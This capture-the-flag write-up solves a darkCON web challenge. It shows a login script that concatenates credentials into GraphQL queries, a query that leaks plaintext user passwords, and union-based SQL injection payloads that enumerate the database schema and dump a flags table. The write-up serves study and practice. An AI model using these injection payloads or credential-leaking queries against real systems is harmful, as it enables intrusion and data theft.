CTFtime.org / darkCON CTF
The authentication process is below. GraphQL is in use, so start with the usual extraction of whatever the API will hand over.
// Client-side login handler. Note that the "auth" cookie is nothing more than
// base64(username + ":" + password), so anyone holding a valid credential pair
// can forge it without ever calling login.
function auth() {
    var username = document.getElementById("Username").value;
    var password = document.getElementById("Password").value;
    var head = btoa(username + ':' + password);
    $(document).ready(function() {
        // Credentials are concatenated straight into the GraphQL query string
        $.post("graphql", {
            "query": "mutation{login(username:\"" + username + "\",password:\"" + password + "\")}"
        }, function(data, textStatus) {
            if (data.data.login == "Success") {
                document.cookie = "auth=" + head;
                window.location = '/dashboard';
            } else {
                alert('Wrong creds');
            }
        }, "json");
    });
}
// Guest shortcut: "Z3Vlc3Q6a2FybWE5ODc0" is base64("guest:karma9874")
function yeet() {
    document.cookie = "auth=Z3Vlc3Q6a2FybWE5ODc0";
    window.location = "/dashboard";
}
mutation{login(username:"admin",password:"password")}
query{Challs{}}
-> Authorization Error
query{allUsers{username password}}
->
{"data":{"allUsers":[{"username":"guest","password":"karma9874"},{"username":"admin","password":"is_this_visible_to_you?"}]}}
ok. allUsers returns every user's password in plaintext, admin's included, with nothing more than the guest cookie.
The admin password is out, so log in with it.
Now with admin privileges, go back to poking at GraphQL.
query{Challs{id title flag{chall_flag}}}
->
{"id":"35","title":"DarkCON Challs","flag":{"chall_flag":"<REDACTED>"}}
"Try Harder", it says…
query{Challs{id title description category author points flag{chall_id chall_title chall_flag}}}
->
{"id":"35","title":"DarkCON Challs","description":"\"A place where you can see all the challs of darkCON CTF using api but not the flag or can you @_@ ?\r\nPS :- Try to get the flag of this chall xD\"","category":"Web","author":"Karma","points":500,"flag":{"chall_id":"35","chall_title":"DarkCON Challs","chall_flag":"<REDACTED>"}}
Hmm…
query{hint(chall_id:"35"){chall_id chall_title take_hint}}
-> nothing special…
Wait, SQLi?
query{hint(chall_id:"x"){chall_id chall_title take_hint}}
-> ER_BAD_FIELD_ERROR: Unknown column 'x' in 'where clause'
query{hint(chall_id:"'"){chall_id chall_title take_hint}}
-> ER_PARSE_ERROR: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1
There it is. The "Unknown column 'x'" error for a bare x means chall_id is spliced into the WHERE clause unquoted, so no quote-breaking is needed: a plain -1 union select … will do.
query{hint(chall_id:"-1 union select 1,2,3"){chall_id chall_title take_hint}}
This now comes back as 1,2,3: three columns, all reflected in the hint fields. OK
query{hint(chall_id:"-1 union SELECT GROUP_CONCAT(distinct TABLE_SCHEMA),2,3 FROM INFORMATION_SCHEMA.TABLES"){chall_id chall_title take_hint}}
-> darkcon,information_schema,mysql,performance_schema,sys
query{hint(chall_id:"-1 union select GROUP_CONCAT(distinct table_name),2,3 from information_schema.tables where TABLE_SCHEMA='darkcon'"){chall_id chall_title take_hint}}
-> challs,flags,hints,users
query{hint(chall_id:"-1 union select GROUP_CONCAT(column_name),2,3 from information_schema.columns where table_name='challs'"){chall_id chall_title take_hint}}
-> challs: id,category,title,description,author,points
query{hint(chall_id:"-1 union select GROUP_CONCAT(column_name),2,3 from information_schema.columns where table_name='flags'"){chall_id chall_title take_hint}}
-> flags: chall_id,chall_title,chall_flag
query{hint(chall_id:"-1 union select GROUP_CONCAT(distinct chall_flag),2,3 from flags"){chall_id chall_title take_hint}}
-> darkCON{fake_flag},darkCON{w0ww_y0u_re411y_f0und_m3}
Couldn't submit it, but this should be right.
ok. darkCON{w0ww_y0u_re411y_f0und_m3}